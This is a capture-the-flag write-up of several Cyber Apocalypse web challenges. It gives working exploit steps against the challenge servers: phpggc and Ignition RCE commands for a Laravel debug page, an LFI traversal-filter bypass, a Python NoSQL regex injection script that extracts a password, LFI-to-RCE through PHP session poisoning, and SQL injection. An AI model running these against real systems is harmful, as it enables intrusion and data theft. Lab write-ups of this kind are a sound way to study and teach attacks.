CTF Apocalypse

CTF Apocalypse

Inspector Gadget

The flag for this challenge is split into multiple parts and stored in different pages.

The part is in main page.

Pastedimage20210419121347.png

Second part can be found by viewing the source code of the main page.

Pastedimage20210419121244.png

Third one in main.css file.

Pastedimage20210419121307.png

And finally the fourth one in main.js.

Pastedimage20210419121331.png

FLAG: CHTB{1nsp3ction_c4n_r3ve4l_us3full_1nf0rm4tion}

DaaS

According to the description the sites home page is a Laravel debug page. Searching Lavarel v8.35.1 exploit in google gives the following think.

Pastedimage20210419140313.png

https://github.com/ambionics/laravel-exploits https://github.com/ambionics/phpggc

Using the following exploits gives the flag.

$ php -d'phar.readonly=0' ./pp/phpggc/phpggc --phar phar -o ./exploit.phar --fast-destruct monolog/rce1 system 'ls /'
$ python3 ./laravel-ignition-rce.py http://178.62.70.150:30970/ ./exploit.phar
$ php -d'phar.readonly=0' ./pp/phpggc/phpggc --phar phar -o ./exploit.phar --fast-destruct monolog/rce1 system 'cat /flagxIfF6'
$ python3 ./laravel-ignition-rce.py http://178.62.70.150:30970/ ./exploit.phar

Pastedimage20210419140608.png

FLAG: HTB{wh3n_7h3_d3bu663r_7urn5_4641n57_7h3_d3bu6633}

CaaS

The challenge is straightforward, the service uses curl. So, we can use the file functionality to read files.

Pastedimage20210422180919.png

FLAG: CHTB{f1le_r3trieval_4s_a_s3rv1ce}

MiniSTRyplace

The language options seems to be vulnerable to LFI.

Pastedimage20210419123515.png

After inspecting the given code, we found that ../ is being replaced with ''.

Pastedimage20210419123538.png

So, lets use ....//....// which will turn into ../../ when request is processed.

Pastedimage20210419123633.png

Now lets display the flag.

Pastedimage20210419123656.png

FLAG: CHTB{b4d_4li3n_pr0gr4m1ng}

Wild Goose Hunt

Pastedimage20210423053258.png

Inspecting the given code revels that the application uses mongo db as database.

Pastedimage20210423053328.png

Testing NoSQL injection from hacktricks responses with successful login.

Pastedimage20210423053437.png

We can use regex utility from nosql to check if the password exists character by character. Doing this manually will be tiring and time consuming. So, lets create a python script to automate and get the flag.

The script which is used is:

import requests

def inject(data):
    r = requests.post('http://139.59.190.72:32397/api/login',data=data)
    line = r.text.split("\"")
    re = list(line)
    if re[5] != "Login Failed":
        return True

secret = ""
while True:
    payload = list("0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ\{\}\-\_")
    for i in payload:
        payload = secret + str(i)
        #print(payload)
        print("\r" + payload, flush=False, end='')
        data = { "username[$eq]":"admin", "password[$regex]":"^" + payload }   
        if inject(data):
            print("\r" + payload, flush=True, end='')
            secret = secret + str(i)
            break


FLAG: CHTB{1_th1nk_the_4l1ens_h4ve_n0t_used_m0ng0_b3f0r3}

Link: https://book.hacktricks.xyz/pentesting-web/nosql-injection

Extortion

Exploring the site revels that the f parameter receives an php file as argument. Looks like possible Local File Inclusion.

Pastedimage20210420075047.png

Let’s inject some payload’s to check if its vulnerable to LFI.

Pastedimage20210420075258.png

Looks like it is vulnerable. SInce, it displays the contents of the /etc/passwd file. Next, we need to find the location of the flag file. Tried searching all possible file nothing seems interesting.

Pastedimage20210420075129.png

Now, we need to find a way to convert this LFI into RCE. After inspecting the application for some time, whenever we hit /send.php with some text it creates and sends php cookies.

So, lets inject php code and see what happens.

Pastedimage20210421174902.png

Since, it uses PHP Session (PHPSESSID). Lets see if it stores the session in the tmp directory.

Pastedimage20210421175020.png

It displays phpinfo page. Next we can inject PHP code for command execution.

Pastedimage20210421175052.png

Now, with the cmd parameter we can display the flag.

Pastedimage20210421175119.png

FLAG: CHTB{th4ts_4_w31rd_3xt0rt10n_@#$?}

Link: https://book.hacktricks.xyz/pentesting-web/file-inclusion

Emoji Voting

Pastedimage20210421050957.png

Looking up on the provided code, database.js revels the used SQL code. So, lets start by injecting SQL queries.

Pastedimage20210421051108.png

Pastedimage20210421051154.png

Running up the above request in sqlmap revels the flag.

FLAG: CHTB{order_me_this_juicy_info}